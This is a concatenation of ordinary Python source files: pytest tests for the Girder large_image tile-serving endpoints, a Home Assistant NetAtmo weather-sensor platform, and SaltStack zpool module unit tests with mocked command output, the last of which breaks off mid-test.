itemId = str(file['itemId'])
# We should have access via getGirderTileSource
source = getGirderTileSource(itemId, user=admin)
image, mime = source.getThumbnail(encoding='PNG', height=200)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
# We can also use a file with getTileSource. The user is ignored.
imagePath = utilities.externaldata('data/sample_image.ptif.sha512')
source = getTileSource(imagePath, user=admin, encoding='PNG')
image, mime = source.getThumbnail(encoding='JPEG', width=200)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
# Test the level0 thumbnail code path
image, mime = source.getThumbnail(
encoding='PNG', width=200, height=100, levelZero=True, fill='blue')
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 200
assert height == 100
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesLoadModelCache(server, admin, fsAssetstore):
loadmodelcache.invalidateLoadModelCache()
token = str(Token().createToken(admin)['_id'])
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# Now the tile request should tell us about the file. These are
# specific to our test file
resp = server.request(path='/item/%s/tiles' % itemId, token=token)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
tileMetadata['sparse'] = 5
_testTilesZXY(server, admin, itemId, tileMetadata, token=token)
assert next(iter(loadmodelcache.LoadModelCache.values()))['hits'] > 70
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesModelLookupCache(server, user, admin, fsAssetstore):
User().load = mock.Mock(wraps=User().load)
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
token = str(Token().createToken(user)['_id'])
lastCount = User().load.call_count
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
token=token, isJson=False)
assert utilities.respStatus(resp) == 200
assert User().load.call_count == lastCount + 1
lastCount = User().load.call_count
resp = server.request(path='/item/%s/tiles/zxy/1/0/0' % itemId,
token=token, isJson=False)
assert utilities.respStatus(resp) == 200
assert User().load.call_count == lastCount
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesDZIEndpoints(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
tileMetadata = resp.json
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
xml = utilities.getBody(resp)
assert 'Width="%d"' % tileMetadata['sizeX'] in xml
assert 'Overlap="0"' in xml
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
xml = utilities.getBody(resp)
assert 'Width="%d"' % tileMetadata['sizeX'] in xml
assert 'Overlap="4"' in xml
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'encoding': 'PNG'
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 228
assert height == 48
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
assert utilities.getBody(resp, text=False) == image
# Test bad queries
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'encoding': 'TIFF'
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'tilesize': 128
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'tilesize': 129
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi.dzi' % itemId, params={
'overlap': -1
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'tilesize': 128
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'tilesize': 129
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/8/0_0.png' % itemId, params={
'overlap': -1
}, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/0/0_0.png' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/20/0_0.png' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/12/0_3.png' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
resp = server.request(path='/item/%s/tiles/dzi_files/12/15_0.png' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
# Test tile sizes
resp = server.request(path='/item/%s/tiles/dzi_files/12/0_0.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 260
assert height == 260
resp = server.request(path='/item/%s/tiles/dzi_files/12/0_1.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 260
assert height == 264
resp = server.request(path='/item/%s/tiles/dzi_files/12/2_1.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 264
assert height == 264
resp = server.request(path='/item/%s/tiles/dzi_files/12/14_2.png' % itemId, params={
'encoding': 'PNG',
'overlap': 4
}, user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
(width, height) = struct.unpack('!LL', image[16:24])
assert width == 68
assert height == 260
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesAfterCopyItem(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
item = Item().load(itemId, force=True)
newItem = Item().copyItem(item, admin)
assert item['largeImage']['fileId'] != newItem['largeImage']['fileId']
Item().remove(item)
_testTilesZXY(boundServer, admin, str(newItem['_id']), tileMetadata)
@pytest.mark.plugin('large_image')
def testTilesAutoSetOption(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore,
name='sample_image.PTIF')
itemId = str(file['itemId'])
# We should already have tile information.
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
# Turn off auto-set and try again
Setting().set(constants.PluginSettings.LARGE_IMAGE_AUTO_SET, 'false')
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 400
assert 'No large image file' in resp.json['message']
# Turn it back on
Setting().set(constants.PluginSettings.LARGE_IMAGE_AUTO_SET, 'true')
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesAssociatedImages(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles/images' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json, ['label' == 'macro']
resp = server.request(path='/item/%s/tiles/images/label' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.JPEGHeader)] == utilities.JPEGHeader
resp = server.request(
path='/item/%s/tiles/images/label' % itemId, user=admin,
isJson=False, params={'encoding': 'PNG', 'width': 256, 'height': 256})
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image[:len(utilities.PNGHeader)] == utilities.PNGHeader
(width, height) = struct.unpack('!LL', image[16:24])
assert max(width, height) == 256
# Test missing associated image
resp = server.request(path='/item/%s/tiles/images/nosuchimage' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image == b''
# Test with an image that doesn't have associated images
file = utilities.uploadExternalFile(
'data/sample_Easy1.png.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles' % itemId, method='POST', user=admin)
assert utilities.respStatus(resp) == 200
resp = server.request(path='/item/%s/tiles/images' % itemId, user=admin)
assert utilities.respStatus(resp) == 200
assert resp.json == []
resp = server.request(path='/item/%s/tiles/images/nosuchimage' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image = utilities.getBody(resp, text=False)
assert image == b''
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesWithFrameNumbers(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample.ome.tif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
# Test that we can get frames via either tiles/zxy or tiles/fzxy and
# that the frames are different
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
image0 = utilities.getBody(resp, text=False)
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False, params={'frame': 0})
assert utilities.respStatus(resp) == 200
assert utilities.getBody(resp, text=False) == image0
resp = server.request(path='/item/%s/tiles/fzxy/0/0/0/0' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
assert utilities.getBody(resp, text=False) == image0
resp = server.request(path='/item/%s/tiles/zxy/0/0/0' % itemId,
user=admin, isJson=False, params={'frame': 1})
assert utilities.respStatus(resp) == 200
image1 = utilities.getBody(resp, text=False)
assert image1 != image0
resp = server.request(path='/item/%s/tiles/fzxy/1/0/0/0' % itemId,
user=admin, isJson=False)
assert utilities.respStatus(resp) == 200
assert utilities.getBody(resp, text=False) == image1
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesHistogram(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(
path='/item/%s/tiles/histogram' % itemId,
params={'width': 2048, 'height': 2048, 'resample': False})
assert len(resp.json) == 3
assert len(resp.json[0]['hist']) == 256
assert resp.json[1]['samples'] == 2801664
assert resp.json[1]['hist'][128] == 176
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesInternalMetadata(server, admin, fsAssetstore):
file = utilities.uploadExternalFile(
'data/sample_image.ptif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
resp = server.request(path='/item/%s/tiles/internal_metadata' % itemId)
assert resp.json['tilesource'] == 'tiff'
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromMultipleDotName(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile(
'yb10kx5k.png', admin, fsAssetstore, name='A name with...dots.png')
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId)
assert tileMetadata['tileWidth'] == 256
assert tileMetadata['tileHeight'] == 256
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 7
assert tileMetadata['magnification'] is None
assert tileMetadata['mm_x'] is None
assert tileMetadata['mm_y'] is None
_testTilesZXY(boundServer, admin, itemId, tileMetadata)
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesForcedConversion(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadExternalFile(
'data/landcover_sample_1000.tif.sha512', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
# We should already have tile information. Ask to delete it so we can
# force convert it
boundServer.request(path='/item/%s/tiles' % itemId, method='DELETE', user=admin)
# Ask to do a forced conversion
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, None, data={'force': True})
assert tileMetadata['levels'] == 3
item = Item().load(itemId, force=True)
assert item['largeImage']['fileId'] != fileId
@pytest.mark.usefixtures('unbindLargeImage')
@pytest.mark.plugin('large_image')
def testTilesFromWithOptions(boundServer, admin, fsAssetstore, girderWorker):
file = utilities.uploadTestFile('yb10kx5k.png', admin, fsAssetstore)
itemId = str(file['itemId'])
fileId = str(file['_id'])
tileMetadata = _postTileViaHttp(boundServer, admin, itemId, fileId, data={'tileSize': 1024})
assert tileMetadata['tileWidth'] == 1024
assert tileMetadata['tileHeight'] == 1024
assert tileMetadata['sizeX'] == 10000
assert tileMetadata['sizeY'] == 5000
assert tileMetadata['levels'] == 5
|
|
"""
Support for the NetAtmo Weather Service.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.netatmo/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
from homeassistant.loader import get_component
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_MODULE = 'modules'
CONF_MODULES = 'modules'
CONF_STATION = 'station'
DEPENDENCIES = ['netatmo']
# NetAtmo Data is uploaded to server every 10 minutes
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=600)
SENSOR_TYPES = {
'temperature': ['Temperature', TEMP_CELSIUS, 'mdi:thermometer'],
'co2': ['CO2', 'ppm', 'mdi:cloud'],
'pressure': ['Pressure', 'mbar', 'mdi:gauge'],
'noise': ['Noise', 'dB', 'mdi:volume-high'],
'humidity': ['Humidity', '%', 'mdi:water-percent'],
'rain': ['Rain', 'mm', 'mdi:weather-rainy'],
'sum_rain_1': ['sum_rain_1', 'mm', 'mdi:weather-rainy'],
'sum_rain_24': ['sum_rain_24', 'mm', 'mdi:weather-rainy'],
'battery_vp': ['Battery', '', 'mdi:battery'],
'min_temp': ['Min Temp.', TEMP_CELSIUS, 'mdi:thermometer'],
'max_temp': ['Max Temp.', TEMP_CELSIUS, 'mdi:thermometer'],
'WindAngle': ['Angle', '', 'mdi:compass'],
'WindStrength': ['Strength', 'km/h', 'mdi:weather-windy'],
'GustAngle': ['Gust Angle', '', 'mdi:compass'],
'GustStrength': ['Gust Strength', 'km/h', 'mdi:weather-windy'],
'rf_status': ['Radio', '', 'mdi:signal'],
'wifi_status': ['Wifi', '', 'mdi:wifi']
}
MODULE_SCHEMA = vol.Schema({
vol.Required(cv.string, default=[]):
vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_STATION): cv.string,
vol.Optional(CONF_MODULES): MODULE_SCHEMA,
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the available Netatmo weather sensors."""
netatmo = get_component('netatmo')
data = NetAtmoData(netatmo.NETATMO_AUTH, config.get(CONF_STATION, None))
dev = []
import lnetatmo
try:
if CONF_MODULES in config:
# Iterate each module
for module_name, monitored_conditions in\
config[CONF_MODULES].items():
# Test if module exist """
if module_name not in data.get_module_names():
_LOGGER.error('Module name: "%s" not found', module_name)
continue
# Only create sensor for monitored """
for variable in monitored_conditions:
dev.append(NetAtmoSensor(data, module_name, variable))
else:
for module_name in data.get_module_names():
for variable in\
data.station_data.monitoredConditions(module_name):
dev.append(NetAtmoSensor(data, module_name, variable))
except lnetatmo.NoDevice:
return None
add_devices(dev)
class NetAtmoSensor(Entity):
"""Implementation of a Netatmo sensor."""
def __init__(self, netatmo_data, module_name, sensor_type):
"""Initialize the sensor."""
self._name = 'Netatmo {} {}'.format(module_name,
SENSOR_TYPES[sensor_type][0])
self.netatmo_data = netatmo_data
self.module_name = module_name
self.type = sensor_type
self._state = None
self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
module_id = self.netatmo_data.\
station_data.moduleByName(module=module_name)['_id']
self._unique_id = "Netatmo Sensor {0} - {1} ({2})".format(self._name,
module_id,
self.type)
self.update()
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def unique_id(self):
"""Return the unique ID for this sensor."""
return self._unique_id
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return SENSOR_TYPES[self.type][2]
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
def update(self):
"""Get the latest data from NetAtmo API and updates the states."""
self.netatmo_data.update()
data = self.netatmo_data.data[self.module_name]
if self.type == 'temperature':
self._state = round(data['Temperature'], 1)
elif self.type == 'humidity':
self._state = data['Humidity']
elif self.type == 'rain':
self._state = data['Rain']
elif self.type == 'sum_rain_1':
self._state = data['sum_rain_1']
elif self.type == 'sum_rain_24':
self._state = data['sum_rain_24']
elif self.type == 'noise':
self._state = data['Noise']
elif self.type == 'co2':
self._state = data['CO2']
elif self.type == 'pressure':
self._state = round(data['Pressure'], 1)
elif self.type == 'battery_vp':
if data['battery_vp'] >= 5500:
self._state = "Full"
elif data['battery_vp'] >= 5100:
self._state = "High"
elif data['battery_vp'] >= 4600:
self._state = "Medium"
elif data['battery_vp'] >= 4100:
self._state = "Low"
elif data['battery_vp'] < 4100:
self._state = "Very Low"
elif self.type == 'min_temp':
self._state = data['min_temp']
elif self.type == 'max_temp':
self._state = data['max_temp']
elif self.type == 'WindAngle':
if data['WindAngle'] >= 330:
self._state = "North (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 300:
self._state = "North-West (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 240:
self._state = "West (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 210:
self._state = "South-West (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 150:
self._state = "South (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 120:
self._state = "South-East (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 60:
self._state = "East (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 30:
self._state = "North-East (%d\xb0)" % data['WindAngle']
elif data['WindAngle'] >= 0:
self._state = "North (%d\xb0)" % data['WindAngle']
elif self.type == 'WindStrength':
self._state = data['WindStrength']
elif self.type == 'GustAngle':
if data['GustAngle'] >= 330:
self._state = "North (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 300:
self._state = "North-West (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 240:
self._state = "West (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 210:
self._state = "South-West (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 150:
self._state = "South (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 120:
self._state = "South-East (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 60:
self._state = "East (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 30:
self._state = "North-East (%d\xb0)" % data['GustAngle']
elif data['GustAngle'] >= 0:
self._state = "North (%d\xb0)" % data['GustAngle']
elif self.type == 'GustStrength':
self._state = data['GustStrength']
elif self.type == 'rf_status':
if data['rf_status'] >= 90:
self._state = "Low"
elif data['rf_status'] >= 76:
self._state = "Medium"
elif data['rf_status'] >= 60:
self._state = "High"
elif data['rf_status'] <= 59:
self._state = "Full"
elif self.type == 'wifi_status':
if data['wifi_status'] >= 86:
self._state = "Bad"
elif data['wifi_status'] >= 71:
self._state = "Middle"
elif data['wifi_status'] <= 70:
self._state = "Good"
class NetAtmoData(object):
"""Get the latest data from NetAtmo."""
def __init__(self, auth, station):
"""Initialize the data object."""
self.auth = auth
self.data = None
self.station_data = None
self.station = station
def get_module_names(self):
"""Return all module available on the API as a list."""
self.update()
return self.data.keys()
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Call the Netatmo API to update the data."""
import lnetatmo
self.station_data = lnetatmo.DeviceList(self.auth)
if self.station is not None:
self.data = self.station_data.lastData(station=self.station,
exclude=3600)
else:
self.data = self.station_data.lastData(exclude=3600)
|
|
"""
Tests for salt.modules.zpool
:codeauthor: Nitin Madhok <[email protected]>, Jorge Schrauwen <[email protected]>
:maintainer: Jorge Schrauwen <[email protected]>
:maturity: new
:depends: salt.utils.zfs
:platform: illumos,freebsd,linux
"""
import pytest
import salt.loader
import salt.modules.zpool as zpool
import salt.utils.decorators
import salt.utils.decorators.path
import salt.utils.zfs
from salt.utils.odict import OrderedDict
from tests.support.mock import MagicMock, patch
from tests.support.zfs import ZFSMockData
@pytest.fixture
def utils_patch():
return ZFSMockData().get_patched_utils()
@pytest.fixture
def configure_loader_modules():
opts = salt.config.DEFAULT_MINION_OPTS.copy()
utils = salt.loader.utils(
opts, whitelist=["zfs", "args", "systemd", "path", "platform"]
)
zpool_obj = {zpool: {"__opts__": opts, "__utils__": utils}}
return zpool_obj
@pytest.mark.slow_test
def test_exists_success(utils_patch):
"""
Tests successful return of exists function
"""
ret = {}
ret["stdout"] = (
"NAME SIZE ALLOC FREE CAP DEDUP HEALTH ALTROOT\n"
"myzpool 149G 128K 149G 0% 1.00x ONLINE -"
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
assert zpool.exists("myzpool")
@pytest.mark.slow_test
def test_exists_failure(utils_patch):
"""
Tests failure return of exists function
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'myzpool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
assert not zpool.exists("myzpool")
def test_healthy(utils_patch):
"""
Tests successful return of healthy function
"""
ret = {}
ret["stdout"] = "all pools are healthy"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
assert zpool.healthy()
def test_status(utils_patch):
"""
Tests successful return of status function
"""
ret = {}
ret["stdout"] = "\n".join(
[
" pool: mypool",
" state: ONLINE",
" scan: scrub repaired 0 in 0h6m with 0 errors on Mon Dec 21 02:06:17"
" 2015",
"config:",
"",
"\tNAME STATE READ WRITE CKSUM",
"\tmypool ONLINE 0 0 0",
"\t mirror-0 ONLINE 0 0 0",
"\t c2t0d0 ONLINE 0 0 0",
"\t c2t1d0 ONLINE 0 0 0",
"",
"errors: No known data errors",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.status()
assert "ONLINE" == ret["mypool"]["state"]
def test_status_with_colons_in_vdevs(utils_patch):
"""
Tests successful return of status function
"""
ret = {}
ret["stdout"] = "\n".join(
[
" pool: mypool",
" state: ONLINE",
" scan: scrub repaired 0 in 0h6m with 0 errors on Mon Dec 21 02:06:17"
" 2015",
"config:",
"",
"\tNAME STATE READ WRITE CKSUM",
"\tmypool ONLINE 0 0 0",
"\t mirror-0 ONLINE 0 0 0",
"\t usb-WD_My_Book_Duo_25F6_....32-0:0 ONLINE 0 0 0",
"\t usb-WD_My_Book_Duo_25F6_....32-0:1 ONLINE 0 0 0",
"",
"errors: No known data errors",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.status()
assert "ONLINE" == ret["mypool"]["state"]
@pytest.mark.slow_test
def test_iostat(utils_patch):
"""
Tests successful return of iostat function
"""
ret = {}
ret["stdout"] = "\n".join(
[
" capacity operations bandwidth",
"pool alloc free read write read write",
"---------- ----- ----- ----- ----- ----- -----",
"mypool 46.7G 64.3G 4 19 113K 331K",
" mirror 46.7G 64.3G 4 19 113K 331K",
" c2t0d0 - - 1 10 114K 334K",
" c2t1d0 - - 1 10 114K 334K",
"---------- ----- ----- ----- ----- ----- -----",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.iostat("mypool", parsable=False)
assert "46.7G" == ret["mypool"]["capacity-alloc"]
def test_iostat_parsable(utils_patch):
"""
Tests successful return of iostat function
.. note:
The command output is the same as the non parsable!
There is no -p flag for zpool iostat, but our type
conversions can handle this!
"""
ret = {}
ret["stdout"] = "\n".join(
[
" capacity operations bandwidth",
"pool alloc free read write read write",
"---------- ----- ----- ----- ----- ----- -----",
"mypool 46.7G 64.3G 4 19 113K 331K",
" mirror 46.7G 64.3G 4 19 113K 331K",
" c2t0d0 - - 1 10 114K 334K",
" c2t1d0 - - 1 10 114K 334K",
"---------- ----- ----- ----- ----- ----- -----",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.iostat("mypool", parsable=True)
assert 50143743180 == ret["mypool"]["capacity-alloc"]
def test_list(utils_patch):
"""
Tests successful return of list function
"""
ret = {}
ret["stdout"] = "mypool\t1.81T\t661G\t1.17T\t35%\t11%\tONLINE"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.list_(parsable=False)
res = OrderedDict(
[
(
"mypool",
OrderedDict(
[
("size", "1.81T"),
("alloc", "661G"),
("free", "1.17T"),
("cap", "35%"),
("frag", "11%"),
("health", "ONLINE"),
]
),
)
]
)
assert ret == res
@pytest.mark.slow_test
def test_list_parsable(utils_patch):
"""
Tests successful return of list function with parsable output
"""
ret = {}
ret["stdout"] = "mypool\t1.81T\t661G\t1.17T\t35%\t11%\tONLINE"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.list_(parsable=True)
res = OrderedDict(
[
(
"mypool",
OrderedDict(
[
("size", 1990116046274),
("alloc", 709743345664),
("free", 1286428604497),
("cap", "35%"),
("frag", "11%"),
("health", "ONLINE"),
]
),
)
]
)
assert ret == res
def test_get(utils_patch):
"""
Tests successful return of get function
"""
ret = {}
ret["stdout"] = "mypool\tsize\t1.81T\t-\n"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.get("mypool", "size", parsable=False)
res = OrderedDict(OrderedDict([("size", "1.81T")]))
assert ret == res
@pytest.mark.slow_test
def test_get_parsable(utils_patch):
"""
Tests successful return of get function with parsable output
"""
ret = {}
ret["stdout"] = "mypool\tsize\t1.81T\t-\n"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.get("mypool", "size", parsable=True)
res = OrderedDict(OrderedDict([("size", 1990116046274)]))
assert ret == res
@pytest.mark.slow_test
def test_get_whitespace(utils_patch):
"""
Tests successful return of get function with a string with whitespaces
"""
ret = {}
ret["stdout"] = "mypool\tcomment\tmy testing pool\t-\n"
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.get("mypool", "comment")
res = OrderedDict(OrderedDict([("comment", "my testing pool")]))
assert ret == res
@pytest.mark.slow_test
def test_scrub_start(utils_patch):
"""
Tests start of scrub
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
mock_exists = MagicMock(return_value=True)
with patch.dict(zpool.__salt__, {"zpool.exists": mock_exists}), patch.dict(
zpool.__salt__, {"cmd.run_all": mock_cmd}
), patch.dict(zpool.__utils__, utils_patch):
ret = zpool.scrub("mypool")
res = OrderedDict(OrderedDict([("scrubbing", True)]))
assert ret == res
@pytest.mark.slow_test
def test_scrub_pause(utils_patch):
"""
Tests pause of scrub
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
